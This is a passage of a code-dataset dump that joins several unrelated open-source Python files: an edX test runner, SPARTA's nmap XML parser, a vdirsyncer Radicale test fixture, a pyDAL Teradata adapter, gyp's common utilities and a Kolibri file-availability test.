    option_defaults = (
        ('fasttest', False),
        ('system', None),
        ('default_store', None),
        ('verbosity', 3),
        ('extra_args', ''),
        ('pdb', False),
    )
    opts = dict(
        (name, getattr(options, name, default))
        for name, default in option_defaults
    )
    if opts['system'] not in ['cms', 'lms']:
        print(colorize(
            'red',
            'No system specified, running tests for both cms and lms.'
        ))
    if opts['default_store'] not in ['draft', 'split']:
        print(colorize(
            'red',
            'No modulestore specified, running tests for both draft and split.'
        ))
    suite = AcceptanceTestSuite('{} acceptance'.format(opts['system']), **opts)
    suite.run()
| agpl-3.0 |
SECFORCE/sparta | parsers/Parser.py | 1 | 2886 | #!/usr/bin/python
'''this module used to parse nmap xml report'''
__author__ = 'yunshu(wustyunshu@hotmail.com)'
__version__= '0.2'
__modified_by = 'ketchup'
__modified_by = 'SECFORCE'
import parsers.Session as Session
import parsers.Host as Host
import xml.dom.minidom
class Parser:
    '''Parses an nmap XML report and exposes its session and host data.'''
    def __init__(self, xml_input):
        '''Build the parser from an nmap XML file name (or file object).'''
        try:
            self.__dom = xml.dom.minidom.parse(xml_input)
            self.__session = None
            self.__hosts = {}
            # Index every <host> element by its IP address.
            for host_node in self.__dom.getElementsByTagName('host'):
                parsed_host = Host.Host(host_node)
                self.__hosts[parsed_host.ip] = parsed_host
        except Exception as ex:
            print("\t[-] Parser error! Invalid nmap file!")
            print(ex)
            raise
    def get_session(self):
        '''Return the scan's metadata as a Session object.'''
        run_node = self.__dom.getElementsByTagName('nmaprun')[0]
        hosts_node = self.__dom.getElementsByTagName('hosts')[0]
        session_info = {
            'finish_time': self.__dom.getElementsByTagName('finished')[0].getAttribute('timestr'),
            'nmap_version': run_node.getAttribute('version'),
            'scan_args': run_node.getAttribute('args'),
            'start_time': run_node.getAttribute('startstr'),
            'total_hosts': hosts_node.getAttribute('total'),
            'up_hosts': hosts_node.getAttribute('up'),
            'down_hosts': hosts_node.getAttribute('down'),
        }
        self.__session = Session.Session(session_info)
        return self.__session
    def get_host(self, ipaddr):
        '''Return the Host object for the given IP address (None if absent).'''
        return self.__hosts.get(ipaddr)
    def all_hosts(self, status=''):
        '''Return the Host objects, optionally filtered by status.'''
        if status == '':
            return self.__hosts.values()
        return [known_host for known_host in self.__hosts.values()
                if known_host.status == status]
    def all_ips(self, status=''):
        '''Return the host IP addresses, optionally filtered by status.'''
        if status == '':
            return [known_host.ip for known_host in self.__hosts.values()]
        return [known_host.ip for known_host in self.__hosts.values()
                if known_host.status == status]
| gpl-3.0 |
tribut/vdirsyncer | tests/storage/dav/servers/radicale/__init__.py | 1 | 3970 | # -*- coding: utf-8 -*-
import os
import sys
import pytest
from vdirsyncer.utils.compat import urlquote
import wsgi_intercept
import wsgi_intercept.requests_intercept
RADICALE_SCHEMA = '''
create table collection (
path varchar(200) not null,
parent_path varchar(200) references collection (path),
primary key (path));
create table item (
name varchar(200) not null,
tag text not null,
collection_path varchar(200) references collection (path),
primary key (name));
create table header (
name varchar(200) not null,
value text not null,
collection_path varchar(200) references collection (path),
primary key (name, collection_path));
create table line (
name text not null,
value text not null,
item_name varchar(200) references item (name),
timestamp bigint not null,
primary key (timestamp));
create table property (
name varchar(200) not null,
value text not null,
collection_path varchar(200) references collection (path),
primary key (name, collection_path));
'''.split(';')
# Radicale storage backend under test; overridable via the RADICALE_BACKEND
# environment variable (empty/unset falls back to 'filesystem').
storage_backend = os.environ.get('RADICALE_BACKEND', '') or 'filesystem'
def do_the_radicale_dance(tmpdir):
    """Reset Radicale's global state and configure it for a single test.

    Wipes every cached ``radicale*`` module, re-imports the config with a
    neutralized RADICALE_CONFIG envvar, installs bob/bob HTTP auth when the
    Radicale version supports it, and points the configured storage backend
    (filesystem or sqlite database) at test-local storage under ``tmpdir``.
    """
    # All of radicale is already global state, the cleanliness of the code and
    # all hope is already lost. This function runs before every test.
    # This wipes out the radicale modules, to reset all of its state.
    for module in list(sys.modules):
        if module.startswith('radicale'):
            del sys.modules[module]
    # radicale.config looks for this envvar. We have to delete it before it
    # tries to load a config file.
    os.environ['RADICALE_CONFIG'] = ''
    import radicale.config
    # Now we can set some basic configuration.
    # Radicale <=0.7 doesn't work with this, therefore we just catch the
    # exception and assume Radicale is open for everyone.
    try:
        radicale.config.set('rights', 'type', 'owner_only')
        radicale.config.set('auth', 'type', 'http')
        import radicale.auth.http
        # Monkeypatch the auth check so only the test user bob/bob passes.
        def is_authenticated(user, password):
            return user == 'bob' and password == 'bob'
        radicale.auth.http.is_authenticated = is_authenticated
    except Exception as e:
        print(e)
    if storage_backend in ('filesystem', 'multifilesystem'):
        radicale.config.set('storage', 'type', storage_backend)
        radicale.config.set('storage', 'filesystem_folder', tmpdir)
    elif storage_backend == 'database':
        radicale.config.set('storage', 'type', 'database')
        radicale.config.set('storage', 'database_url', 'sqlite://')
        from radicale.storage import database
        # Create the schema in the fresh in-memory sqlite database.
        s = database.Session()
        for line in RADICALE_SCHEMA:
            s.execute(line)
        s.commit()
    else:
        raise RuntimeError(storage_backend)
class ServerMixin(object):
    """Test mixin that serves Radicale in-process via wsgi_intercept."""
    @pytest.fixture(autouse=True)
    def setup(self, request, tmpdir):
        # Reset/configure Radicale, then intercept HTTP traffic to
        # 127.0.0.1:80 and route it to the Radicale WSGI application.
        do_the_radicale_dance(str(tmpdir))
        from radicale import Application
        wsgi_intercept.requests_intercept.install()
        wsgi_intercept.add_wsgi_intercept('127.0.0.1', 80, Application)
        # Uninstall the intercept after the test (registered as finalizer).
        def teardown():
            wsgi_intercept.remove_wsgi_intercept('127.0.0.1', 80)
            wsgi_intercept.requests_intercept.uninstall()
        request.addfinalizer(teardown)
    @pytest.fixture
    def get_storage_args(self, get_item):
        # Returns a factory building storage kwargs for user bob; when a
        # collection name is given, it is primed by uploading and deleting
        # one item so the collection exists on the server.
        def inner(collection='test'):
            url = 'http://127.0.0.1/bob/'
            if collection is not None:
                collection += self.storage_class.fileext
                url = url.rstrip('/') + '/' + urlquote(collection)
            rv = {'url': url, 'username': 'bob', 'password': 'bob',
                  'collection': collection}
            if collection is not None:
                s = self.storage_class(**rv)
                s.delete(*s.upload(get_item()))
            return rv
        return inner
| mit |
aayush2911/Fibonaccio | web2py/gluon/packages/dal/pydal/adapters/teradata.py | 22 | 2850 | # -*- coding: utf-8 -*-
from .._globals import IDENTITY
from ..connection import ConnectionPool
from .base import BaseAdapter
class TeradataAdapter(BaseAdapter):
    """pyDAL adapter for Teradata, connected through pyodbc."""
    drivers = ('pyodbc',)
    # Mapping of pyDAL field types to Teradata column/constraint SQL.
    types = {
        'boolean': 'CHAR(1)',
        'string': 'VARCHAR(%(length)s)',
        'text': 'VARCHAR(2000)',
        'json': 'VARCHAR(4000)',
        'password': 'VARCHAR(%(length)s)',
        'blob': 'BLOB',
        'upload': 'VARCHAR(%(length)s)',
        'integer': 'INT',
        'bigint': 'BIGINT',
        'float': 'REAL',
        'double': 'DOUBLE',
        'decimal': 'NUMERIC(%(precision)s,%(scale)s)',
        'date': 'DATE',
        'time': 'TIME',
        'datetime': 'TIMESTAMP',
        # Modified Constraint syntax for Teradata.
        # Teradata does not support ON DELETE.
        'id': 'INT GENERATED ALWAYS AS IDENTITY',  # Teradata Specific
        'reference': 'INT',
        'list:integer': 'VARCHAR(4000)',
        'list:string': 'VARCHAR(4000)',
        'list:reference': 'VARCHAR(4000)',
        'geometry': 'ST_GEOMETRY',
        'big-id': 'BIGINT GENERATED ALWAYS AS IDENTITY',  # Teradata Specific
        'big-reference': 'BIGINT',
        'reference FK': ' REFERENCES %(foreign_key)s',
        'reference TFK': ' FOREIGN KEY (%(field_name)s) REFERENCES %(foreign_table)s (%(foreign_key)s)',
        }
    def __init__(self,db,uri,pool_size=0,folder=None,db_codec ='UTF-8',
                 credential_decoder=IDENTITY, driver_args={},
                 adapter_args={}, do_connect=True, after_connection=None):
        # Standard pyDAL adapter setup; the pyodbc connection string is
        # everything after the 'teradata://' scheme prefix.
        self.db = db
        self.dbengine = "teradata"
        self.uri = uri
        if do_connect: self.find_driver(adapter_args,uri)
        self.pool_size = pool_size
        self.folder = folder
        self.db_codec = db_codec
        self._after_connection = after_connection
        self.find_or_make_work_folder()
        ruri = uri.split('://', 1)[1]
        def connector(cnxn=ruri,driver_args=driver_args):
            return self.driver.connect(cnxn,**driver_args)
        self.connector = connector
        if do_connect: self.reconnect()
    def close(self,action='commit',really=True):
        # Teradata does not implicitly close off the cursor
        # leading to SQL_ACTIVE_STATEMENTS limit errors
        self.cursor.close()
        ConnectionPool.close(self, action, really)
    def LEFT_JOIN(self):
        # Teradata spells a left join as LEFT OUTER JOIN.
        return 'LEFT OUTER JOIN'
    # Similar to MSSQL, Teradata can't specify a range (for Pageby)
    def select_limitby(self, sql_s, sql_f, sql_t, sql_w, sql_o, limitby):
        # Note: the offset (lmin) is unpacked but ignored -- TOP only caps
        # the number of rows returned.
        if limitby:
            (lmin, lmax) = limitby
            sql_s += ' TOP %i' % lmax
        return 'SELECT %s %s FROM %s%s%s;' % (sql_s, sql_f, sql_t, sql_w, sql_o)
    def _truncate(self, table, mode=''):
        # ``mode`` is accepted for interface compatibility but unused;
        # Teradata truncates via DELETE ... ALL.
        tablename = table._tablename
        return ['DELETE FROM %s ALL;' % (tablename)]
| gpl-2.0 |
seann1/portfolio5 | .meteor/dev_bundle/lib/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/common.py | 1292 | 20063 | # Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from __future__ import with_statement
import collections
import errno
import filecmp
import os.path
import re
import tempfile
import sys
# A minimal memoizing decorator. It'll blow up if the args aren't immutable,
# among other "problems".
class memoize(object):
  """A minimal memoizing decorator.

  Results are cached keyed on the tuple of positional arguments, so the
  arguments must be hashable; keyword arguments are not supported.
  """
  def __init__(self, func):
    self.func = func
    self.cache = {}
  def __call__(self, *args):
    if args not in self.cache:
      self.cache[args] = self.func(*args)
    return self.cache[args]
class GypError(Exception):
  """Error class representing an error, which is to be presented
  to the user.  The main entry point will catch and display this;
  raise it for user-facing failures instead of printing directly.
  """
  pass
def ExceptionAppend(e, msg):
  """Append a message to the given exception's message."""
  # Mutates e.args in place: the first positional argument has |msg|
  # appended; any additional args are preserved untouched.
  if not e.args:
    e.args = (msg,)
    return
  extended = str(e.args[0]) + ' ' + msg
  if len(e.args) == 1:
    e.args = (extended,)
  else:
    e.args = (extended,) + e.args[1:]
def FindQualifiedTargets(target, qualified_list):
  """
  Given a list of qualified targets, return those whose target name
  component equals the specified |target|.
  """
  found = []
  for qualified in qualified_list:
    if ParseQualifiedTarget(qualified)[1] == target:
      found.append(qualified)
  return found
def ParseQualifiedTarget(target):
  """Splits a qualified target into [build_file, target, toolset].

  Missing components are returned as None.  rsplit is used so a Windows
  drive-letter colon in the build file path is not mistaken for the
  build_file/target separator.
  """
  build_file = None
  if ':' in target:
    build_file, target = target.rsplit(':', 1)
  toolset = None
  if '#' in target:
    target, toolset = target.rsplit('#', 1)
  return [build_file, target, toolset]
def ResolveTarget(build_file, target, toolset):
  """Resolves a qualified target into canonical [build_file, target, toolset].

  build_file is the file relative to which 'target' is defined; target is
  the qualified target; toolset is the default toolset for that target.
  """
  # This function resolves a target into a canonical form:
  # - a fully defined build file, either absolute or relative to the current
  # directory
  # - a target name
  # - a toolset
  [parsed_build_file, target, parsed_toolset] = ParseQualifiedTarget(target)
  if parsed_build_file:
    if build_file:
      # If a relative path, parsed_build_file is relative to the directory
      # containing build_file.  If build_file is not in the current directory,
      # parsed_build_file is not a usable path as-is.  Resolve it by
      # interpreting it as relative to build_file.  If parsed_build_file is
      # absolute, it is usable as a path regardless of the current directory,
      # and os.path.join will return it as-is.
      build_file = os.path.normpath(os.path.join(os.path.dirname(build_file),
                                                 parsed_build_file))
      # Further (to handle cases like ../cwd), make it relative to cwd)
      if not os.path.isabs(build_file):
        build_file = RelativePath(build_file, '.')
    else:
      build_file = parsed_build_file
  if parsed_toolset:
    toolset = parsed_toolset
  return [build_file, target, toolset]
def BuildFile(fully_qualified_target):
  """Returns the build-file component of a fully qualified target string."""
  # Extracts the build file from the fully qualified target.
  return ParseQualifiedTarget(fully_qualified_target)[0]
def GetEnvironFallback(var_list, default):
  """Look up a key in the environment, with fallback to secondary keys
  and finally falling back to a default value."""
  for name in var_list:
    try:
      return os.environ[name]
    except KeyError:
      continue
  return default
def QualifiedTarget(build_file, target, toolset):
  """Builds a qualified target string.

  "Qualified" means the file that a target was defined in and the target
  name, separated by a colon, suffixed by a # and the toolset name:
  /path/to/file.gyp:target_name#toolset
  """
  fully_qualified = ':'.join([build_file, target])
  if toolset:
    fully_qualified = '#'.join([fully_qualified, toolset])
  return fully_qualified
@memoize
def RelativePath(path, relative_to, follow_path_symlink=True):
  """Returns a path to |path| relative to |relative_to| (both taken as
  relative to the current directory).

  If |follow_path_symlink| is true (default) and |path| is a symlink, the
  returned path points at the real file; otherwise at the symlink itself.
  Memoized: results are cached per argument tuple.
  """
  # Convert to normalized (and therefore absolute paths).
  if follow_path_symlink:
    path = os.path.realpath(path)
  else:
    path = os.path.abspath(path)
  relative_to = os.path.realpath(relative_to)
  # On Windows, we can't create a relative path to a different drive, so just
  # use the absolute path.
  if sys.platform == 'win32':
    if (os.path.splitdrive(path)[0].lower() !=
        os.path.splitdrive(relative_to)[0].lower()):
      return path
  # Split the paths into components.
  path_split = path.split(os.path.sep)
  relative_to_split = relative_to.split(os.path.sep)
  # Determine how much of the prefix the two paths share.
  prefix_len = len(os.path.commonprefix([path_split, relative_to_split]))
  # Put enough ".." components to back up out of relative_to to the common
  # prefix, and then append the part of path_split after the common prefix.
  relative_split = [os.path.pardir] * (len(relative_to_split) - prefix_len) + \
                   path_split[prefix_len:]
  if len(relative_split) == 0:
    # The paths were the same.
    return ''
  # Turn it back into a string and we're done.
  return os.path.join(*relative_split)
@memoize
def InvertRelativePath(path, toplevel_dir=None):
  """Given a path like foo/bar that is relative to toplevel_dir, return
  the inverse relative path back to the toplevel_dir.

  E.g. os.path.normpath(os.path.join(path, InvertRelativePath(path)))
  should always produce the empty string, unless the path contains symlinks.
  """
  # An empty path inverts to itself.
  if not path:
    return path
  toplevel_dir = '.' if toplevel_dir is None else toplevel_dir
  return RelativePath(toplevel_dir, os.path.join(toplevel_dir, path))
def FixIfRelativePath(path, relative_to):
  """Like RelativePath, but returns |path| unchanged if it is absolute."""
  return path if os.path.isabs(path) else RelativePath(path, relative_to)
def UnrelativePath(path, relative_to):
  """Returns a path identifying |path| relative to the current directory.

  Assumes |relative_to| is relative to the current directory and |path| is
  relative to the dirname of |relative_to|.
  """
  base_dir = os.path.dirname(relative_to)
  return os.path.normpath(os.path.join(base_dir, path))
# re objects used by EncodePOSIXShellArgument.  See IEEE 1003.1 XCU.2.2 at
# http://www.opengroup.org/onlinepubs/009695399/utilities/xcu_chap02.html#tag_02_02
# and the documentation for various shells.
# _quote is a pattern that should match any argument that needs to be quoted
# with double-quotes by EncodePOSIXShellArgument.  It matches the following
# characters appearing anywhere in an argument:
#   \t, \n, space  parameter separators
#   #              comments
#   $              expansions (quoted to always expand within one argument)
#   %              called out by IEEE 1003.1 XCU.2.2
#   &              job control
#   '              quoting
#   (, )           subshell execution
#   *, ?, [        pathname expansion
#   ;              command delimiter
#   <, >, |        redirection
#   =              assignment
#   {, }           brace expansion (bash)
#   ~              tilde expansion
# It also matches the empty string, because "" (or '') is the only way to
# represent an empty string literal argument to a POSIX shell.
#
# This does not match the characters in _escape, because those need to be
# backslash-escaped regardless of whether they appear in a double-quoted
# string.
_quote = re.compile('[\t\n #$%&\'()*;<=>?[{|}~]|^$')
# _escape is a pattern that should match any character that needs to be
# escaped with a backslash, whether or not the argument matched the _quote
# pattern.  _escape is used with re.sub to backslash anything in _escape's
# first match group, hence the (parentheses) in the regular expression.
#
# _escape matches the following characters appearing anywhere in an argument:
#   "  to prevent POSIX shells from interpreting this character for quoting
#   \  to prevent POSIX shells from interpreting this character for escaping
#   `  to prevent POSIX shells from interpreting this character for command
#      substitution
# Missing from this list is $, because the desired behavior of
# EncodePOSIXShellArgument is to permit parameter (variable) expansion.
#
# Also missing from this list is !, which bash will interpret as the history
# expansion character when history is enabled.  bash does not enable history
# by default in non-interactive shells, so this is not thought to be a problem.
# ! was omitted from this list because bash interprets "\!" as a literal string
# including the backslash character (avoiding history expansion but retaining
# the backslash), which would not be correct for argument encoding.  Handling
# this case properly would also be problematic because bash allows the history
# character to be changed with the histchars shell variable.  Fortunately,
# as history is not enabled in non-interactive shells and
# EncodePOSIXShellArgument is only expected to encode for non-interactive
# shells, there is no room for error here by ignoring !.
_escape = re.compile(r'(["\\`])')
def EncodePOSIXShellArgument(argument):
  """Encodes |argument| suitably for consumption by POSIX shells.

  argument may be quoted and escaped as necessary to ensure that POSIX shells
  treat the returned value as a literal representing the argument passed to
  this function.  Parameter (variable) expansions beginning with $ are allowed
  to remain intact without escaping the $, to allow the argument to contain
  references to variables to be expanded by the shell.
  """
  if not isinstance(argument, str):
    argument = str(argument)
  # Double-quote when the argument contains any shell metacharacter (or is
  # empty); backslash-escape ", \ and ` in either case.
  quote = '"' if _quote.search(argument) else ''
  return quote + _escape.sub(r'\\\1', argument) + quote
def EncodePOSIXShellList(list):
  """Encodes |list| suitably for consumption by POSIX shells.

  Each item is encoded with EncodePOSIXShellArgument and the results are
  joined with single spaces, the shell's argument separator.
  """
  return ' '.join(EncodePOSIXShellArgument(item) for item in list)
def DeepDependencyTargets(target_dicts, roots):
  """Returns the recursive list of target dependencies.

  Walks both 'dependencies' and 'dependencies_original' of every target
  reachable from |roots|; the roots themselves are excluded from the result.
  """
  dependencies = set()
  pending = set(roots)
  while pending:
    current = pending.pop()
    if current in dependencies:
      continue
    dependencies.add(current)
    spec = target_dicts[current]
    for key in ('dependencies', 'dependencies_original'):
      pending.update(spec.get(key, []))
  return list(dependencies - set(roots))
def BuildFileTargets(target_list, build_file):
  """From a target_list, returns the subset from the specified build_file.
  """
  matching = []
  for qualified_target in target_list:
    if BuildFile(qualified_target) == build_file:
      matching.append(qualified_target)
  return matching
def AllTargets(target_list, target_dicts, build_file):
  """Returns all targets (direct and dependencies) for the specified build_file.
  """
  # Targets defined directly in build_file, followed by everything they
  # transitively depend on.
  bftargets = BuildFileTargets(target_list, build_file)
  deptargets = DeepDependencyTargets(target_dicts, bftargets)
  return bftargets + deptargets
def WriteOnDiff(filename):
  """Write to a file only if the new contents differ.

  Arguments:
    filename: name of the file to potentially write to.
  Returns:
    A file like object which will write to temporary file and only overwrite
    the target if it differs (on close).
  """
  class Writer(object):
    """Wrapper around file which only covers the target if it differs."""
    def __init__(self):
      # Pick temporary file in the same directory as the target so the
      # final rename stays on one filesystem.
      tmp_fd, self.tmp_path = tempfile.mkstemp(
          suffix='.tmp',
          prefix=os.path.split(filename)[1] + '.gyp.',
          dir=os.path.split(filename)[0])
      try:
        self.tmp_file = os.fdopen(tmp_fd, 'wb')
      except Exception:
        # Don't leave turds behind.
        os.unlink(self.tmp_path)
        raise
    def __getattr__(self, attrname):
      # Delegate everything else (write, writelines, ...) to self.tmp_file
      return getattr(self.tmp_file, attrname)
    def close(self):
      try:
        # Close tmp file.
        self.tmp_file.close()
        # Determine if different.
        same = False
        try:
          same = filecmp.cmp(self.tmp_path, filename, False)
        except OSError, e:
          # ENOENT simply means the target doesn't exist yet.
          if e.errno != errno.ENOENT:
            raise
        if same:
          # The new file is identical to the old one, just get rid of the new
          # one.
          os.unlink(self.tmp_path)
        else:
          # The new file is different from the old one, or there is no old one.
          # Rename the new file to the permanent name.
          #
          # tempfile.mkstemp uses an overly restrictive mode, resulting in a
          # file that can only be read by the owner, regardless of the umask.
          # There's no reason to not respect the umask here, which means that
          # an extra hoop is required to fetch it and reset the new file's mode.
          #
          # No way to get the umask without setting a new one?  Set a safe one
          # and then set it back to the old value.
          umask = os.umask(077)
          os.umask(umask)
          os.chmod(self.tmp_path, 0666 & ~umask)
          if sys.platform == 'win32' and os.path.exists(filename):
            # NOTE: on windows (but not cygwin) rename will not replace an
            # existing file, so it must be preceded with a remove. Sadly there
            # is no way to make the switch atomic.
            os.remove(filename)
          os.rename(self.tmp_path, filename)
      except Exception:
        # Don't leave turds behind.
        os.unlink(self.tmp_path)
        raise
  return Writer()
def EnsureDirExists(path):
  """Make sure the directory for |path| exists."""
  directory = os.path.dirname(path)
  try:
    os.makedirs(directory)
  except OSError:
    # Deliberately best-effort: the common failure is that the directory
    # already exists, which is fine.
    pass
def GetFlavor(params):
  """Returns |params.flavor| if it's set, the system's default flavor else."""
  if 'flavor' in params:
    return params['flavor']
  # Exact sys.platform values with a dedicated flavor name.
  exact = {
      'cygwin': 'win',
      'win32': 'win',
      'darwin': 'mac',
  }
  if sys.platform in exact:
    return exact[sys.platform]
  # Platforms identified by a version-suffixed prefix (e.g. 'sunos5').
  for prefix, flavor in (('sunos', 'solaris'),
                         ('freebsd', 'freebsd'),
                         ('openbsd', 'openbsd'),
                         ('netbsd', 'netbsd'),
                         ('aix', 'aix')):
    if sys.platform.startswith(prefix):
      return flavor
  return 'linux'
def CopyTool(flavor, out_path):
  """Finds (flock|mac|win)_tool.gyp in the gyp directory and copies it
  to |out_path|.

  Returns None.  Flavors without a support script are a silent no-op.
  """
  # aix and solaris just need flock emulation. mac and win use more
  # complicated support scripts.
  prefix = {
      'aix': 'flock',
      'solaris': 'flock',
      'mac': 'mac',
      'win': 'win'
  }.get(flavor, None)
  if not prefix:
    return

  # Slurp input file.
  source_path = os.path.join(
      os.path.dirname(os.path.abspath(__file__)), '%s_tool.py' % prefix)
  with open(source_path) as source_file:
    source = source_file.readlines()

  # Add header (after the shebang line) and write it out.
  tool_path = os.path.join(out_path, 'gyp-%s-tool' % prefix)
  with open(tool_path, 'w') as tool_file:
    tool_file.write(
        ''.join([source[0], '# Generated by gyp. Do not edit.\n'] + source[1:]))

  # Make file executable.  The 0o755 spelling works on Python 2.6+ and 3;
  # the old 0755 literal is a SyntaxError under Python 3.
  os.chmod(tool_path, 0o755)
# From Alex Martelli,
# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/52560
# ASPN: Python Cookbook: Remove duplicates from a sequence
# First comment, dated 2001/10/13.
# (Also in the printed Python Cookbook.)
def uniquer(seq, idfun=None):
  """Return the elements of |seq| with duplicates removed, first-seen order.

  |idfun| maps an element to the (hashable) key used for duplicate
  detection; identity by default.
  """
  key_of = idfun if idfun is not None else (lambda x: x)
  seen = {}
  unique = []
  for element in seq:
    key = key_of(element)
    if key not in seen:
      seen[key] = 1
      unique.append(element)
  return unique
# Based on http://code.activestate.com/recipes/576694/.
class OrderedSet(collections.MutableSet):
  """A set that remembers insertion order.

  Backed by a dict mapping key -> [key, prev, next] nodes that are threaded
  into a circular doubly linked list anchored at a sentinel (self.end).
  """

  def __init__(self, iterable=None):
    self.end = end = []
    end += [None, end, end]  # sentinel node for doubly linked list
    self.map = {}  # key --> [key, prev, next]
    if iterable is not None:
      self |= iterable

  def __len__(self):
    return len(self.map)

  def __contains__(self, key):
    return key in self.map

  def add(self, key):
    # Link a new node just before the sentinel (i.e. at the tail).
    # Re-adding an existing key is a no-op and keeps its original position.
    if key not in self.map:
      end = self.end
      curr = end[1]
      curr[2] = end[1] = self.map[key] = [key, curr, end]

  def discard(self, key):
    # Unlink the node from the list; no-op if the key is absent.
    if key in self.map:
      key, prev_item, next_item = self.map.pop(key)
      prev_item[2] = next_item
      next_item[1] = prev_item

  def __iter__(self):
    # Walk forward from the sentinel: yields keys in insertion order.
    end = self.end
    curr = end[2]
    while curr is not end:
      yield curr[0]
      curr = curr[2]

  def __reversed__(self):
    # Walk backward from the sentinel.
    end = self.end
    curr = end[1]
    while curr is not end:
      yield curr[0]
      curr = curr[1]

  # The second argument is an addition that causes a pylint warning.
  def pop(self, last=True):  # pylint: disable=W0221
    """Remove and return the newest (or oldest, if not |last|) key."""
    if not self:
      raise KeyError('set is empty')
    key = self.end[1][0] if last else self.end[2][0]
    self.discard(key)
    return key

  def __repr__(self):
    if not self:
      return '%s()' % (self.__class__.__name__,)
    return '%s(%r)' % (self.__class__.__name__, list(self))

  def __eq__(self, other):
    # Order-sensitive against another OrderedSet; order-insensitive
    # against any other iterable.
    if isinstance(other, OrderedSet):
      return len(self) == len(other) and list(self) == list(other)
    return set(self) == set(other)

  # Extensions to the recipe.
  def update(self, iterable):
    """Add every element of |iterable|, keeping first-seen order."""
    for i in iterable:
      if i not in self:
        self.add(i)
class CycleError(Exception):
  """An exception raised when an unexpected cycle is detected."""

  def __init__(self, nodes):
    self.nodes = nodes

  def __str__(self):
    return 'CycleError: cycle involving: %s' % (self.nodes,)
def TopologicallySorted(graph, get_edges):
  r"""Topologically sort based on a user provided edge definition.

  Args:
    graph: A list of node names.
    get_edges: A function mapping from node name to a hashable collection
               of node names which this node has outgoing edges to.
  Returns:
    A list containing all of the node in graph in topological order.
    It is assumed that calling get_edges once for each node and caching is
    cheaper than repeatedly calling get_edges.
  Raises:
    CycleError in the event of a cycle.
  Example:
    graph = {'a': '$(b) $(c)', 'b': 'hi', 'c': '$(b)'}
    def GetEdges(node):
      return re.findall(r'\$\(([^)]+)\)', graph[node])
    print TopologicallySorted(graph.keys(), GetEdges)
    ==>
    ['a', 'c', 'b']
  """
  # memoize is defined elsewhere in this module; it caches edge lookups so
  # get_edges runs at most once per node.
  get_edges = memoize(get_edges)
  visited = set()    # nodes whose subtree has been fully emitted
  visiting = set()   # nodes on the current DFS path (for cycle detection)
  ordered_nodes = []
  def Visit(node):
    # Depth-first: a node is prepended only after all of its successors,
    # so every node ends up before everything it points at.
    if node in visiting:
      raise CycleError(visiting)
    if node in visited:
      return
    visited.add(node)
    visiting.add(node)
    for neighbor in get_edges(node):
      Visit(neighbor)
    visiting.remove(node)
    ordered_nodes.insert(0, node)
  # sorted() makes the output deterministic regardless of input order.
  for node in sorted(graph):
    Visit(node)
  return ordered_nodes
def CrossCompileRequested():
  """Return the first truthy cross-compile environment setting, else a
  falsy value (mirrors the original `or` chain exactly)."""
  # TODO: figure out how to not build extra host objects in the
  # non-cross-compile case when this is enabled, and enable unconditionally.
  value = None
  for var in ('GYP_CROSSCOMPILE',
              'AR_host', 'CC_host', 'CXX_host',
              'AR_target', 'CC_target', 'CXX_target'):
    value = os.environ.get(var)
    if value:
      return value
  # All falsy: return the last lookup's value, as the `or` chain would.
  return value
| gpl-2.0 |
mrpau/kolibri | kolibri/core/content/test/test_file_availability.py | 3 | 7432 | import os
import shutil
import tempfile
import uuid
from collections import namedtuple
from django.test import TransactionTestCase
from mock import patch
from .sqlalchemytesting import django_connection_engine
from kolibri.core.content.models import LocalFile
from kolibri.core.content.utils.file_availability import (
get_available_checksums_from_disk,
)
from kolibri.core.content.utils.file_availability import (
get_available_checksums_from_remote,
)
from kolibri.core.discovery.models import NetworkLocation
from kolibri.core.utils.cache import process_cache
def get_engine(connection_string):
    """Patched stand-in for sqlalchemybridge.get_engine.

    Ignores |connection_string| and always returns the Django-connection
    test engine so the tests below hit the test database.
    """
    return django_connection_engine()
# Fixture identifiers (hex UUIDs) matching the content_test.json fixture:
# the channel under test and its two known file checksums.
test_channel_id = "6199dde695db4ee4ab392222d5af1e5c"
file_id_1 = "6bdfea4a01830fdd4a585181c0b8068c"
file_id_2 = "e00699f859624e0f875ac6fe1e13d648"
@patch("kolibri.core.content.utils.sqlalchemybridge.get_engine", new=get_engine)
class LocalFileByDisk(TransactionTestCase):
    """Tests for get_available_checksums_from_disk against a fake mounted
    drive laid out like a Kolibri content directory."""

    fixtures = ["content_test.json"]

    def setUp(self):
        super(LocalFileByDisk, self).setUp()
        process_cache.clear()
        # Fake "drive": a temp dir with an empty content/storage tree.
        self.mock_home_dir = tempfile.mkdtemp()
        self.mock_storage_dir = os.path.join(self.mock_home_dir, "content", "storage")
        os.makedirs(self.mock_storage_dir)
        self.mock_drive_id = "123"

    def createmock_content_file(self, prefix, suffix="mp4"):
        """Create an empty storage file named |prefix|.|suffix|, sharded by
        the first two characters of |prefix| as Kolibri storage expects."""
        second_dir = os.path.join(self.mock_storage_dir, prefix[0], prefix[1])
        try:
            os.makedirs(second_dir)
        except OSError:
            # Shard directory already exists.
            pass
        open(os.path.join(second_dir, prefix + "." + suffix), "w+b")

    def createmock_content_file1(self):
        # File belonging to the test channel (mp4).
        self.createmock_content_file(file_id_1, suffix="mp4")

    def createmock_content_file2(self):
        # Second file belonging to the test channel (epub).
        self.createmock_content_file(file_id_2, suffix="epub")

    @patch("kolibri.core.content.utils.file_availability.get_mounted_drive_by_id")
    def test_set_one_file_in_channel(self, drive_mock):
        DriveData = namedtuple("DriveData", ["id", "datafolder"])
        drive_mock.return_value = DriveData(
            id=self.mock_drive_id, datafolder=self.mock_home_dir
        )
        self.createmock_content_file1()
        checksums = get_available_checksums_from_disk(
            test_channel_id, self.mock_drive_id
        )
        self.assertEqual(checksums, set([file_id_1]))

    @patch("kolibri.core.content.utils.file_availability.get_mounted_drive_by_id")
    def test_set_one_file_not_in_channel(self, drive_mock):
        DriveData = namedtuple("DriveData", ["id", "datafolder"])
        drive_mock.return_value = DriveData(
            id=self.mock_drive_id, datafolder=self.mock_home_dir
        )
        # A random checksum that does not belong to the channel is ignored.
        self.createmock_content_file(uuid.uuid4().hex)
        checksums = get_available_checksums_from_disk(
            test_channel_id, self.mock_drive_id
        )
        self.assertEqual(checksums, set())

    @patch("kolibri.core.content.utils.file_availability.get_mounted_drive_by_id")
    def test_set_two_files_in_channel(self, drive_mock):
        DriveData = namedtuple("DriveData", ["id", "datafolder"])
        drive_mock.return_value = DriveData(
            id=self.mock_drive_id, datafolder=self.mock_home_dir
        )
        self.createmock_content_file1()
